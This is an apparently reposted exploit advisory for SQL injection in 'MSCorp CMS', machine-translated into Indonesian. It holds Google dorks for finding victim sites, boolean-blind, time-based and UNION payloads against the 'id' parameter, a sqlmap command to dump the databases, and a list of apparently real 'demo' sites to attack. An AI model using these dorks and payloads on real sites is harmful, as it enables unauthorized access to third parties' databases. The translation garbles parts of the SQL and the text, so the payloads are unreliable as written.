Dork: "Dikembangkan Oleh MSCorp"
[+] Judul: - MSCorp CMS - SQL Injection Vulnerability
[+] Tanggal: - 7 - Agustus - 2015
[+] Penjual Homepage: - http://www.mscorp.co.in/
[+] Versi: - Semua Versi
[+] Diuji pada: - Nginx / 1.4.5, PHP / 5.2.17, Linux - Jendela
[+] Kategori: - webapps
[+] Google Dorks: - "Dikembangkan Oleh MSCorp"
"Dikembangkan Dengan MSCorp" + inurl:.? Php / id =
"Dikembangkan Dengan MSCorp" inurl: "? Php"
[+] Exploit Penulis: - Shelesh Rauthan (ShOrTy420 alias @ Stian SEB)
[+] Nama Team: - Team Alastor Breeze, Cerdas-Eksploitasi
[+] Official Website: - serverfarming.com, intelligentexploit.com
[+] Para Anggota resmi: -!! Sh0rTy420, P @ rL0u $, nfIn Ty, Th3G0v3Rn3R, m777k
[+] Greedz ke: -@@lu, Lalit, MyLappy <3, Diksha, DK
[+] Kontak: - fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
================================================== =======
[+] Severity Level: - Tinggi
[+] Request Cara (s): - GET / POST
[+] Parameter Rentan (s): - id
[+] Wilayah yang Terkena (s): - Seluruh admin, database, Server
[+] Tentang: - tidak berkepentingan SQL Injection melalui Beberapa Php Files menyebabkan kesalahan SQL
[+] SQL Berkas rentan: - /home/DOMAIN/public_html/XXX.php
[+] POC: - http://127.0.0.1/XXX.php?id=[SQL] '
Kerentanan web sql Injection dapat dimanfaatkan dengan remote
penyerang tanpa hak istimewa web-aplikasi pengguna akun atau pengguna
interaksi.
. http: // www [WEBSITE] .com / XXX.php id = 6 rangka 'berdasarkan [SQL IN4JECTION] - +
. http: // www [WEBSITE] .com / XXX.php id = 6 union 'semua pilih [SQL INJECTION] - +
SqlMap
++++++++++++++++++++++++++
python sqlmap.py -url "http://127.0.0.1/XXX.php?id=[SQL]" -dbs
++++++++++++++++++++++++++
-
Parameter: id (GET)
Jenis: buta berbasis boolean
Judul: DAN boolean berbasis buta - MANA atau klausa HAVING
Payload: id = 6 AND 1803 = 1803
Jenis: DAN / ATAU waktu berbasis buta
Judul: MySQL> = 5.0.12 DAN waktu berbasis buta
Payload: id = 6 DAN TIDUR (5)
Jenis: permintaan UNION
Judul: permintaan UNION Generic (NULL) - 1 kolom
Payload: id = 6 UNION ALL SELECT CONCAT (0x717a626a71,0x72454556666e64596a4a, 0x7178767071) -
-
[+] DEMO: - http://www.hoXtelsahyadrialibaug.com/gallery.php?id=6 '
http://www.tapolaXtourism.com/showContent.php?id=17 '
http://www.reigeXltech.com/content.php?content=10 '
http://www.koyXanalakeview.com/facilities.php?content=4 '
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.